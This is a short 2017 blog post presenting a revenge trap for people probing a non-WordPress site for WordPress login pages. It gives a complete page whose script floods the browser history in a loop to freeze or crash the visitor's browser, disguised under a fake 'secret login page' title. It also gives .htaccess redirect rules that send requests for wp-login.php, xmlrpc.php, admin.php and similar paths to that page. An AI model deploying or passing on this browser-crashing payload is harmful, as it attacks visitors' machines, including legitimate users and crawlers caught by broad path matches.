27 January 2017

Hackers who hit your website for wp-login.php


Ever noticed hackers trying to break in to WordPress websites, even though your site isn't on the WordPress platform?

Here is a little fun for those hackers who blindly go after WordPress on every website they can find.

This script is from GitHub in reference to the crashsafari.com website. It reloads the page continuously, overwhelming the browser history. It really slows down your computer.

Copy this entire script to  a document and name it secret-login.php. The title on the webpage adds a distraction for when the page loads.


<!DOCTYPE html>
<html>
<head>
<title>Setting up secret login page... Please wait</title>
</head>
<body>

<?PHP
echo "<br />";
echo "Setting up secret login page... Please wait<p />";
echo "<br />";
?>

<script>
  var total = "";
  for( var i = 0; i < 100000; i++ ) {
      total = total + i.toString();
      history.pushState(0,0, total );
  }
</script>
</body>
</html>


Save this php file to the root of your website, or wherever you like.

In your .htaccess file, add the following lines. Make sure you have the RewriteEngine on:

RewriteEngine On

Here is the good part:

# Swat them suckers away
# Usage: RedirectMatch (pattern) (location of script file)
# Shows up as 302 in the access log and is not case-sensitive
RedirectMatch (?i)wp-(login\.php|admin|content|includes) http://example.com/secret-login.php
RedirectMatch (?i)logo_img\.php http://example.com/secret-login.php
RedirectMatch (?i)xmlrpc\.php http://example.com/secret-login.php
RedirectMatch (?i)admin\.php http://example.com/secret-login.php



The pattern is matched on the the entire page request. So, http://example.com/wp-admin/ will work the same as http://example.com/something/wp-admin/.

The (?i) eliminates case sensitivity in the pattern match. So, WP-LOGIN matches as well as Wp-LOgin or whatever.

The first line matches all wp-login.php, wp-admin, or wp-content requests to your website.

The rest of the lines are more requests from hackers seen in the logs for logo_img.php, xmlrpc.php and admin.php. Add your own file names to the list as you see fit.

They get sent to http://example.com/secret-login.php to suffer the from the above script.


Obviously, don't use the wp-xxxxxx pattern if you are using WordPress.


2 comments: